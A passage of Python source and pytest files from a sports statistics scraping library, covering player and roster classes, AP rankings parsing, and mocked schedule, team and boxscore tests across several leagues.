return self._defensive_win_shares
@_float_property_decorator
def win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive and defensive plays.
"""
return self._win_shares
@_float_property_decorator
def win_shares_per_40_minutes(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team per 40 minutes of playtime. An average player has a contribution
of 0.100.
"""
return self._win_shares_per_40_minutes
@_float_property_decorator
def offensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of offensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._offensive_box_plus_minus
@_float_property_decorator
def defensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of defensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._defensive_box_plus_minus
@_float_property_decorator
def box_plus_minus(self):
"""
Returns a ``float`` of the total number of points per 100 possessions
the player contributed in comparison to an average player in the
league.
"""
return self._box_plus_minus
class Roster(object):
"""
Get stats for all players on a roster.
Request a team's roster for a given season and create instances of the
Player class for each player, containing a detailed list of the players
statistics and information.
Parameters
----------
team : string
The team's abbreviation, such as 'PURDUE' for the Purdue Boilermakers.
year : string (optional)
The 4-digit year to pull the roster from, such as '2018'. If left
blank, defaults to the most recent season.
"""
def __init__(self, team, year=None):
self._team = team
self._players = []
self._find_players(year)
def _pull_team_page(self, url):
"""
Download the team page.
Download the requested team's season page and create a PyQuery object.
Parameters
----------
url : string
A string of the built URL for the requested team and season.
Returns
-------
PyQuery object
Returns a PyQuery object of the team's HTML page.
"""
try:
return pq(url)
except HTTPError:
return None
def _create_url(self, year):
"""
Build the team URL.
Build a URL given a team's abbreviation and the 4-digit year.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
Returns
-------
string
Returns a string of the team's season page for the requested team
and year.
"""
return ROSTER_URL % (self._team.lower(), year)
def _get_id(self, player):
"""
Parse the player ID.
Given a PyQuery object representing a single player on the team roster,
parse the player ID and return it as a string.
Parameters
----------
player : PyQuery object
A PyQuery object representing the player information from the
roster table.
Returns
-------
string
Returns a string of the player ID.
"""
name_tag = player('th[data-stat="player"] a')
name = re.sub(r'.*/cbb/players/', '', str(name_tag))
return re.sub(r'\.html.*', '', name)
def _find_players(self, year):
"""
Find all player IDs for the requested team.
For the requested team and year (if applicable), pull the roster table
and parse the player ID for all players on the roster and create an
instance of the Player class for the player. All player instances are
added to the 'players' property to get all stats for all players on a
team.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
"""
if not year:
year = utils._find_year_for_season('ncaab')
url = self._create_url(year)
page = self._pull_team_page(url)
if not page:
output = ("Can't pull requested team page. Ensure the follow "
"URL exists: %s" % url)
raise ValueError(output)
players = page('table#roster tbody tr').items()
for player in players:
player_id = self._get_id(player)
player_instance = Player(player_id)
self._players.append(player_instance)
@property
def players(self):
"""
Returns a ``list`` of player instances for each player on the requested
team's roster.
"""
return self._players
```
#### File: sportsreference/ncaaf/rankings.py
```python
import re
from pyquery import PyQuery as pq
from .. import utils
from .constants import RANKINGS_SCHEME, RANKINGS_URL
from six.moves.urllib.error import HTTPError
class Rankings:
"""
Get all Associated Press (AP) rankings on a week-by-week basis.
Grab a list of the rankings published by the Associated Press to easily
query the hierarchy of teams each week. The results expose the current and
previous rankings as well as the movement for each team in the list.
Parameters
----------
year : string (optional)
A string of the requested year to pull rankings from. Defaults to the
most recent season.
"""
def __init__(self, year=None):
self._rankings = {}
self._find_rankings(year)
def _pull_rankings_page(self, year):
"""
Download the rankings page.
Download the rankings page for the requested year and create a PyQuery
object.
Parameters
----------
year : string
A string of the requested year to pull rankings from.
Returns
-------
PyQuery object
Returns a PyQuery object of the rankings HTML page.
"""
try:
return pq(RANKINGS_URL % year)
except HTTPError:
return None
def _get_team(self, team):
"""
Retrieve team's name and abbreviation.
The team's name and abbreviation are embedded within the 'school_name'
tag and, in the case of the abbreviation, require special parsing as it
is located in the middle of a URI. The name and abbreviation are
returned for the requested school.
Parameters
----------
team : PyQuery object
A PyQuery object representing a single row in a table on the
rankings page.
Returns
-------
tuple (string, string)
Returns a tuple of two strings where the first string is the team's
abbreviation, such as 'PURDUE' and the second string is the team's
name, such as 'Purdue'.
"""
name_tag = team('td[data-stat="school_name"]')
abbreviation = re.sub(r'.*/cfb/schools/', '', str(name_tag('a')))
abbreviation = re.sub(r'/.*', '', abbreviation)
name = team('td[data-stat="school_name"] a').text()
return abbreviation, name
def _find_rankings(self, year):
"""
Retrieve the rankings for each week.
Find and retrieve all AP rankings for the requested year and combine
them on a per-week basis. Each week contains information about the
name, abbreviation, rank, movement, and previous rank for each team
as well as the date and week number the results were published on.
Parameters
----------
year : string
A string of the requested year to pull rankings from.
"""
if not year:
year = utils._find_year_for_season('ncaaf')
page = self._pull_rankings_page(year)
if not page:
output = ("Can't pull rankings page. Ensure the following URL "
"exists: %s" % RANKINGS_URL)
raise ValueError(output)
rankings = page('table#ap tbody tr').items()
weekly_rankings = []
week = 0
for team in rankings:
if 'class="thead"' in str(team):
self._rankings[int(week)] = weekly_rankings
weekly_rankings = []
continue
abbreviation, name = self._get_team(team)
rank = utils._parse_field(RANKINGS_SCHEME, team, 'rank')
week = utils._parse_field(RANKINGS_SCHEME, team, 'week')
date = utils._parse_field(RANKINGS_SCHEME, team, 'date')
previous = utils._parse_field(RANKINGS_SCHEME, team, 'previous')
change = utils._parse_field(RANKINGS_SCHEME, team, 'change')
if 'decrease' in str(team(RANKINGS_SCHEME['change'])):
change = int(change) * -1
elif 'increase' in str(team(RANKINGS_SCHEME['change'])):
try:
change = int(change)
except ValueError:
change = 0
else:
change = 0
rank_details = {
'abbreviation': abbreviation,
'name': name,
'rank': int(rank),
'week': int(week),
'date': date,
'previous': previous,
'change': change
}
weekly_rankings.append(rank_details)
# Add the final rankings which is not terminated with another header
# row and hence will not hit the first if statement in the loop above.
self._rankings[int(week)] = weekly_rankings
@property
def current_extended(self):
"""
Returns a ``list`` of ``dictionaries`` of the most recent AP rankings.
The list is ordered in terms of the ranking so the #1 team will be in
the first element and the #25 team will be the last element. Each
dictionary has the following structure::
{
'abbreviation': Team's abbreviation, such as 'PURDUE' (str),
'name': Team's full name, such as 'Purdue' (str),
'rank': Team's rank for the current week (int),
'week': Week number for the results, such as 19 (int),
'date': Date the rankings were released, such as '2017-03-01'.
Can also be 'Final' for the final rankings or
'Preseason' for preseason rankings (str),
'previous': The team's previous rank, if applicable (str),
'change': The amount the team moved up or down the rankings.
Moves up the ladder have a positive number while
drops yield a negative number and teams that didn't
move have 0 (int)
}
"""
latest_week = max(self._rankings.keys())
ordered_dict = sorted(self._rankings[latest_week],
key=lambda k: k['rank'])
return ordered_dict
@property
def current(self):
"""
Returns a ``dictionary`` of the most recent rankings from the
Associated Press where each key is a ``string`` of the team's
abbreviation and each value is an ``int`` of the team's rank for the
current week.
"""
rankings_dict = {}
for team in self.current_extended:
rankings_dict[team['abbreviation']] = team['rank']
return rankings_dict
@property
def complete(self):
"""
Returns a ``dictionary`` where each key is a week number as an ``int``
and each value is a ``list`` of ``dictionaries`` containing the AP
rankings for each week. Within each list is a dictionary of team
information such as name, abbreviation, rank, and more. Note that the
list might not necessarily be in the same order as the rankings.
The overall dictionary has the following structure::
{
week number, ie 16 (int): [
{
'abbreviation': Team's abbreviation, such as 'PURDUE'
(str),
'name': Team's full name, such as 'Purdue' (str),
'rank': Team's rank for the current week (int),
'week': Week number for the results, such as 16 (int),
'date': Date the rankings were released, such as
'2017-12-03'. Can also be 'Final' for the final
rankings or 'Preseason' for preseason rankings
(str),
'previous': The team's previous rank, if applicable
(str),
'change': The amount the team moved up or down the
rankings. Moves up the ladder have a positive
number while drops yield a negative number
and teams that didn't move have 0 (int)
},
...
],
...
}
"""
return self._rankings
```
#### File: integration/schedule/test_mlb_schedule.py
```python
import mock
import os
import pandas as pd
import pytest
from datetime import datetime
from flexmock import flexmock
from sportsreference import utils
from sportsreference.constants import AWAY, HOME, LOSS, WIN
from sportsreference.mlb.boxscore import Boxscore
from sportsreference.mlb.constants import DAY, NIGHT, SCHEDULE_URL
from sportsreference.mlb.schedule import Schedule
MONTH = 4
YEAR = 2017
NUM_GAMES_IN_SCHEDULE = 162
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'mlb', filename)
return open('%s' % filepath, 'r').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
def __call__(self, div):
return read_file('table.html')
schedule = read_file('%s-schedule-scores.html' % YEAR)
return MockPQ(schedule)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestMLBSchedule:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'game': 2,
'boxscore_index': 'TBA/TBA201704040',
'date': 'Tuesday, Apr 4',
'datetime': datetime(2017, 4, 4),
'game_number_for_day': 1,
'location': AWAY,
'opponent_abbr': 'TBR',
'result': WIN,
'runs_scored': 5,
'runs_allowed': 0,
'innings': 9,
'record': '1-1',
'rank': 3,
'games_behind': 0.5,
'winner': 'Sabathia',
'loser': 'Odorizzi',
'save': None,
'game_duration': '3:07',
'day_or_night': NIGHT,
'attendance': 19366,
'streak': '+'
}
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.schedule = Schedule('NYY')
def test_mlb_schedule_returns_correct_number_of_games(self):
assert len(self.schedule) == NUM_GAMES_IN_SCHEDULE
def test_mlb_schedule_returns_requested_match_from_index(self):
match_two = self.schedule[1]
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_mlb_schedule_returns_requested_match_from_date(self):
match_two = self.schedule(datetime(2017, 4, 4))
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_mlb_schedule_returns_second_game_in_double_header(self):
match_two = self.schedule(datetime(2017, 5, 14), 2)
results = {
'game': 35,
'date': 'Sunday, May 14 (2)',
'datetime': datetime(2017, 5, 14),
'game_number_for_day': 2,
'location': HOME,
'opponent_abbr': 'HOU',
'result': LOSS,
'runs_scored': 7,
'runs_allowed': 10,
'innings': 9,
'record': '22-13',
'rank': 1,
'games_behind': -0.5,
'winner': 'Morton',
'loser': 'Tanaka',
'save': None,
'game_duration': '3:49',
'day_or_night': NIGHT,
'attendance': 47883,
'streak': '-'
}
for attribute, value in results.items():
assert getattr(match_two, attribute) == value
def test_mlb_schedule_dataframe_returns_dataframe(self):
df = pd.DataFrame([self.results], index=['NYY'])
match_two = self.schedule[1]
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, match_two.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_mlb_schedule_dataframe_extended_returns_dataframe(self):
df = pd.DataFrame([{'key': 'value'}])
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule[1].dataframe_extended
frames = [df, result]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_mlb_schedule_all_dataframe_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe.drop_duplicates(keep=False)
assert len(result) == NUM_GAMES_IN_SCHEDULE
assert set(result.columns.values) == set(self.results.keys())
def test_mlb_schedule_all_dataframe_extended_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe_extended
assert len(result) == NUM_GAMES_IN_SCHEDULE
def test_no_games_for_date_raises_value_error(self):
with pytest.raises(ValueError):
self.schedule(datetime.now())
```
#### File: integration/schedule/test_ncaab_schedule.py
```python
import mock
import os
import pandas as pd
import pytest
from datetime import datetime
from flexmock import flexmock
from sportsreference import utils
from sportsreference.constants import NEUTRAL, REGULAR_SEASON, WIN
from sportsreference.ncaab.boxscore import Boxscore
from sportsreference.ncaab.constants import SCHEDULE_URL
from sportsreference.ncaab.schedule import Schedule
MONTH = 11
YEAR = 2017
NUM_GAMES_IN_SCHEDULE = 39
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'ncaab', filename)
return open('%s' % filepath, 'r').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
def __call__(self, div):
return read_file('table.html')
schedule = read_file('%s-schedule.html' % (YEAR + 1))
return MockPQ(schedule)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestNCAABSchedule:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'game': 2,
'boxscore_index': '2017-11-14-21-kansas',
'date': 'Tue, Nov 14, 2017',
'time': '9:30 pm/est',
'datetime': datetime(2017, 11, 14, 21, 30),
'type': REGULAR_SEASON,
'location': NEUTRAL,
'opponent_abbr': 'kentucky',
'opponent_name': 'Kentucky',
'opponent_rank': 7,
'opponent_conference': 'SEC',
'result': WIN,
'points_for': 65,
'points_against': 61,
'overtimes': 0,
'season_wins': 2,
'season_losses': 0,
'streak': 'W 2',
'arena': 'United Center'
}
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.schedule = Schedule('KANSAS')
def test_ncaab_schedule_returns_correct_number_of_games(self):
assert len(self.schedule) == NUM_GAMES_IN_SCHEDULE
def test_ncaab_schedule_returns_requested_match_from_index(self):
match_two = self.schedule[1]
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_ncaab_schedule_returns_requested_match_from_date(self):
match_two = self.schedule(datetime(2017, 11, 14))
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_ncaab_schedule_dataframe_returns_dataframe(self):
df = pd.DataFrame([self.results], index=['KANSAS'])
match_two = self.schedule[1]
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, match_two.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_ncaab_schedule_dataframe_extended_returns_dataframe(self):
df = pd.DataFrame([{'key': 'value'}])
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule[1].dataframe_extended
frames = [df, result]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_ncaab_schedule_all_dataframe_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe.drop_duplicates(keep=False)
assert len(result) == NUM_GAMES_IN_SCHEDULE
assert set(result.columns.values) == set(self.results.keys())
def test_ncaab_schedule_all_dataframe_extended_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe_extended
assert len(result) == NUM_GAMES_IN_SCHEDULE
def test_no_games_for_date_raises_value_error(self):
with pytest.raises(ValueError):
self.schedule(datetime.now())
```
#### File: integration/teams/test_nba_integration.py
```python
import mock
import os
import pandas as pd
import pytest
from flexmock import flexmock
from sportsreference import utils
from sportsreference.nba.constants import SEASON_PAGE_URL
from sportsreference.nba.teams import Teams
MONTH = 1
YEAR = 2017
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'nba_stats', filename)
return open('%s' % filepath, 'r').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
def __call__(self, div):
if div == 'div#all_team-stats-base':
return read_file('%s_team.html' % YEAR)
else:
return read_file('%s_opponent.html' % YEAR)
html_contents = read_file('NBA_%s.html' % YEAR)
return MockPQ(html_contents)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestNBAIntegration:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'rank': 26,
'abbreviation': 'DET',
'name': '<NAME>',
'games_played': 82,
'minutes_played': 19805,
'field_goals': 3269,
'field_goal_attempts': 7282,
'field_goal_percentage': .449,
'three_point_field_goals': 631,
'three_point_field_goal_attempts': 1915,
'three_point_field_goal_percentage': .330,
'two_point_field_goals': 2638,
'two_point_field_goal_attempts': 5367,
'two_point_field_goal_percentage': .492,
'free_throws': 1140,
'free_throw_attempts': 1586,
'free_throw_percentage': .719,
'offensive_rebounds': 908,
'defensive_rebounds': 2838,
'total_rebounds': 3746,
'assists': 1732,
'steals': 574,
'blocks': 310,
'turnovers': 973,
'personal_fouls': 1467,
'points': 8309,
'opp_field_goals': 3144,
'opp_field_goal_attempts': 6830,
'opp_field_goal_percentage': .460,
'opp_three_point_field_goals': 767,
'opp_three_point_field_goal_attempts': 2098,
'opp_three_point_field_goal_percentage': .366,
'opp_two_point_field_goals': 2377,
'opp_two_point_field_goal_attempts': 4732,
'opp_two_point_field_goal_percentage': .502,
'opp_free_throws': 1346,
'opp_free_throw_attempts': 1726,
'opp_free_throw_percentage': .780,
'opp_offensive_rebounds': 656,
'opp_defensive_rebounds': 2861,
'opp_total_rebounds': 3517,
'opp_assists': 1929,
'opp_steals': 551,
'opp_blocks': 339,
'opp_turnovers': 1046,
'opp_personal_fouls': 1434,
'opp_points': 8401
}
self.abbreviations = [
'BOS', 'CLE', 'TOR', 'WAS', 'ATL', 'MIL', 'IND', 'CHI', 'MIA',
'DET', 'CHO', 'NYK', 'ORL', 'PHI', 'BRK', 'GSW', 'SAS', 'HOU',
'LAC', 'UTA', 'OKC', 'MEM', 'POR', 'DEN', 'NOP', 'DAL', 'SAC',
'MIN', 'LAL', 'PHO'
]
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.teams = Teams()
def test_nba_integration_returns_correct_number_of_teams(self):
assert len(self.teams) == len(self.abbreviations)
def test_nba_integration_returns_correct_attributes_for_team(self):
detroit = self.teams('DET')
for attribute, value in self.results.items():
assert getattr(detroit, attribute) == value
def test_nba_integration_returns_correct_team_abbreviations(self):
for team in self.teams:
assert team.abbreviation in self.abbreviations
def test_nba_integration_dataframe_returns_dataframe(self):
df = pd.DataFrame([self.results], index=['DET'])
detroit = self.teams('DET')
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, detroit.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_nba_integration_all_teams_dataframe_returns_dataframe(self):
result = self.teams.dataframes.drop_duplicates(keep=False)
assert len(result) == len(self.abbreviations)
assert set(result.columns.values) == set(self.results.keys())
def test_nba_invalid_team_name_raises_value_error(self):
with pytest.raises(ValueError):
self.teams('INVALID_NAME')
```
#### File: tests/unit/test_ncaab_teams.py
```python
from flexmock import flexmock
from mock import PropertyMock
from sportsreference.ncaab.schedule import Schedule
from sportsreference.ncaab.teams import Team
class TestNCAABTeams:
def test_ncaab_schedule_returns_schedule(self, *args, **kwargs):
flexmock(Team) \
.should_receive('_parse_team_data') \
.and_return(None)
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
team = Team(None, 1)
assert len(team.schedule) == 0
def test_two_point_field_goal_percentage_returns_default(self):
flexmock(Team) \
.should_receive('_parse_team_data') \
.and_return(None)
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
team = Team(None, 1)
mock_field_goals = PropertyMock(return_value=0)
type(team).two_point_field_goals = mock_field_goals
type(team).two_point_field_goal_attempts = mock_field_goals
result = team.two_point_field_goal_percentage
assert result == 0.0
def test_opp_two_point_field_goal_percentage_returns_default(self):
flexmock(Team) \
.should_receive('_parse_team_data') \
.and_return(None)
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
team = Team(None, 1)
mock_field_goals = PropertyMock(return_value=0)
type(team).opp_two_point_field_goals = mock_field_goals
type(team).opp_two_point_field_goal_attempts = mock_field_goals
result = team.opp_two_point_field_goal_percentage
assert result == 0.0
```
#### File: tests/unit/test_nfl_schedule.py
```python
from flexmock import flexmock
from mock import PropertyMock
from sportsreference.constants import (AWAY,
HOME,
LOSS,
NEUTRAL,
POST_SEASON,
REGULAR_SEASON,
WIN)
from sportsreference.nfl.constants import (CONF_CHAMPIONSHIP,
DIVISION,
SUPER_BOWL,
WILD_CARD)
from sportsreference.nfl.schedule import Game, Schedule
YEAR = 2017
class TestNFLSchedule:
def setup_method(self, *args, **kwargs):
flexmock(Game) \
.should_receive('_parse_game_data') \
.and_return(None)
self.game = Game(None, REGULAR_SEASON, YEAR)
def test_away_game_returns_away_location(self):
fake_location = PropertyMock(return_value='@')
type(self.game)._location = fake_location
assert self.game.location == AWAY
def test_home_game_returns_home_location(self):
fake_location = PropertyMock(return_value='')
type(self.game)._location = fake_location
assert self.game.location == HOME
def test_neutral_game_returns_neutral_location(self):
fake_location = PropertyMock(return_value='N')
type(self.game)._location = fake_location
assert self.game.location == NEUTRAL
def test_winning_result_returns_win(self):
fake_result = PropertyMock(return_value='W')
type(self.game)._result = fake_result
assert self.game.result == WIN
def test_losing_result_returns_loss(self):
fake_result = PropertyMock(return_value='L')
type(self.game)._result = fake_result
assert self.game.result == LOSS
def test_overtime_returns_overtime(self):
fake_overtime = PropertyMock(return_value='OT')
type(self.game)._overtime = fake_overtime
assert self.game.overtime
def test_no_overtime_returns_none(self):
fake_overtime = PropertyMock(return_value='')
type(self.game)._overtime = fake_overtime
assert not self.game.overtime
def test_regular_season_type(self):
assert self.game.type == REGULAR_SEASON
def test_playoff_type(self):
game = Game(None, POST_SEASON, YEAR)
assert game.type == POST_SEASON
def test_wild_card_game_returns_wild_card(self):
fake_week = PropertyMock(return_value='Wild Card')
type(self.game)._week = fake_week
assert self.game.week == WILD_CARD
def test_division_playoff_game_returns_division(self):
fake_week = PropertyMock(return_value='Division')
type(self.game)._week = fake_week
assert self.game.week == DIVISION
def test_conference_championship_returns_division(self):
fake_week = PropertyMock(return_value='Conf. Champ.')
type(self.game)._week = fake_week
assert self.game.week == CONF_CHAMPIONSHIP
def test_super_bowl_returns_super_bowl(self):
fake_week = PropertyMock(return_value='SuperBowl')
type(self.game)._week = fake_week
assert self.game.week == SUPER_BOWL
def test_empty_game_class_returns_dataframe_of_none(self):
assert self.game._points_scored is None
assert self.game._points_allowed is None
assert self.game.dataframe is None
def test_no_dataframes_returns_none(self):
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
schedule = Schedule('DET')
fake_game = flexmock(dataframe=None)
fake_games = PropertyMock(return_value=fake_game)
type(schedule).__iter__ = fake_games
assert schedule.dataframe is None
def test_no_dataframes_extended_returns_none(self):
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
schedule = Schedule('DET')
fake_game = flexmock(dataframe_extended=None)
fake_games = PropertyMock(return_value=fake_game)
type(schedule).__iter__ = fake_games
assert schedule.dataframe_extended is None
```
#### File: tests/unit/test_nhl_boxscore.py
```python
from flexmock import flexmock
from mock import patch, PropertyMock
from pyquery import PyQuery as pq
from sportsreference import utils
from sportsreference.constants import AWAY, HOME
from sportsreference.nhl.boxscore import Boxscore, Boxscores
class MockField:
def __init__(self, field):
self._field = field
def text(self):
return self._field
class MockBoxscoreData:
def __init__(self, fields):
self._fields = fields
def __call__(self, field):
return self
def items(self):
return [self._fields]
class MockName:
def __init__(self, name):
self._name = name
def text(self):
return self._name
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 404
self.html_contents = html_contents
self.text = html_contents
boxscore = read_file('%s.html' % BOXSCORE)
return MockPQ(boxscore)
class TestNHLBoxscore:
@patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
self.boxscore = Boxscore(None)
def test_away_team_wins(self):
fake_away_goals = PropertyMock(return_value=4)
fake_home_goals = PropertyMock(return_value=3)
type(self.boxscore)._away_goals = fake_away_goals
type(self.boxscore)._home_goals = fake_home_goals
assert self.boxscore.winner == AWAY
def test_home_team_wins(self):
fake_away_goals = PropertyMock(return_value=3)
fake_home_goals = PropertyMock(return_value=4)
type(self.boxscore)._away_goals = fake_away_goals
type(self.boxscore)._home_goals = fake_home_goals
assert self.boxscore.winner == HOME
def test_winning_name_is_home(self):
expected_name = 'Home Name'
fake_winner = PropertyMock(return_value=HOME)
fake_home_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_name = fake_home_name
assert self.boxscore.winning_name == expected_name
def test_winning_name_is_away(self):
expected_name = 'Away Name'
fake_winner = PropertyMock(return_value=AWAY)
fake_away_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_name = fake_away_name
assert self.boxscore.winning_name == expected_name
def test_winning_abbr_is_home(self):
expected_name = 'HOME'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=HOME)
fake_home_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_abbr = fake_home_abbr
assert self.boxscore.winning_abbr == expected_name
def test_winning_abbr_is_away(self):
expected_name = 'AWAY'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=AWAY)
fake_away_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_abbr = fake_away_abbr
assert self.boxscore.winning_abbr == expected_name
def test_losing_name_is_home(self):
expected_name = 'Home Name'
fake_winner = PropertyMock(return_value=AWAY)
fake_home_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_name = fake_home_name
assert self.boxscore.losing_name == expected_name
def test_losing_name_is_away(self):
expected_name = 'Away Name'
fake_winner = PropertyMock(return_value=HOME)
fake_away_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_name = fake_away_name
assert self.boxscore.losing_name == expected_name
def test_losing_abbr_is_home(self):
expected_name = 'HOME'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=AWAY)
fake_home_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_abbr = fake_home_abbr
assert self.boxscore.losing_abbr == expected_name
def test_losing_abbr_is_away(self):
expected_name = 'AWAY'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=HOME)
fake_away_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_abbr = fake_away_abbr
assert self.boxscore.losing_abbr == expected_name
def test_invalid_away_game_winning_goals_returns_default(self):
goals = ['0', '1', 'bad']
fake_goals = PropertyMock(return_value=goals)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_game_winning_goals = fake_goals
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_game_winning_goals == 1
def test_invalid_away_even_strength_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_even_strength_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_even_strength_assists == 1
def test_invalid_home_even_strength_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=0)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._home_even_strength_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_even_strength_assists == 1
def test_invalid_away_power_play_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_power_play_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_power_play_assists == 1
def test_invalid_home_power_play_assits_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=0)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._home_power_play_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_power_play_assists == 1
def test_invalid_away_short_handed_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=3)
